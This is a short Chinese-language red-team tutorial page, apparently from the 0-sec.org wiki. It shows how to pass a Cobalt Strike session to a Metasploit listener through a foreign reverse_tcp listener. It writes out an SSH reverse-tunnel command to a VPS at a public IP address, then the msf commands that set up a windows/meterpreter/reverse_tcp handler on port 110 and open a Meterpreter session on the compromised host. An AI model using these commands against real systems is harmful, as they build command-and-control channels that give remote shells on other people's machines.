windows/foreign/reverse_tcp [ 反向 tcp 外部监听器 ]

跟上面差不多,只不过这次换了下协议而已,首先,还是先把本地和 vps 之间的 ssh 隧道打通,具体操作如下

# ssh -C -f -N -g -R 0.0.0.0:110:192.168.3.57:110 root@45.63.121.57 -p 22
# ps -ef | grep "192.168.3.57"

image

而后,创建一个 reverse_tcp 的外部监听器

image

继续使用派生功能,将其派生到 reverse_tcp 这个外部监听器上

image

稍等片刻,便会看到本地 msf 的 meterpreter 上线,注意,此处外部监听器用的是 tcp 的 110 端口,那么你后面的 meterpreter payload 也一定要用 tcp 的 110 端口,这样数据才能正常对接交换

msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set lhost 192.168.3.57
msf5 > set lport 110
msf5 > set exitonsession false
msf5 > exploit -j
msf5 > sessions -i 1
meterpreter > sysinfo
meterpreter > getuid

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-27 14:33:02

results matching ""

    No results matching ""